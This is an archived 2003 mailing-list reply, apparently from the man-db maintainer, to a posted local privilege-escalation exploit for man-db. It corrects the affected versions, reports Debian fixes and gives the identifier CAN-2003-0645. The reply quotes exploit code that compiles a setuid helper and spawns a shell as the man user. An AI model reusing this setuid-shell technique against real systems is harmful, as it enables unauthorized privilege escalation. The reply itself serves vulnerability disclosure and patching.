In article <20030806082358.2564.qmailat_private>, Vade 79 wrote: ># man-db[v2.4.1-]: local uid=man exploit. Correction: 2.3.12 (a beta release) and 2.3.18 to 2.4.1. >echo "[*] making runme, and mansh source files..." >cat <<EOF>runme.c >#include <stdio.h> >#include <stdlib.h> >#include <unistd.h> >#include <sys/types.h> >#include <sys/stat.h> >int main(int argc,char **argv){ > setreuid(geteuid(),geteuid()); > system("cc ${TMPDIR}/mansh.c -o ${TMPDIR}/mansh"); > chmod("${TMPDIR}/mansh",S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP); > unlink(argv[0]); > exit(0); >} >EOF >cat <<EOF>mansh.c >#include <stdio.h> >#include <sys/types.h> >#include <unistd.h> >int main(){ > setreuid(geteuid(),geteuid()); > execl("/bin/sh","sh",0); > exit(0); >} >EOF It can be done with a lot less effort and in about a tenth of the space without resorting to compiled code, but I'll leave that as an exercise for the reader ... :-) Anyway, Debian man-db 2.3.20-18.woody.2 (stable) and 2.4.1-12 (unstable) fix this. I'm working to release 2.4.2 as well. This is CAN-2003-0645. -- Colin Watson [cjwatsonat_private]
This archive was generated by hypermail 2b30 : Fri Aug 08 2003 - 11:33:31 PDT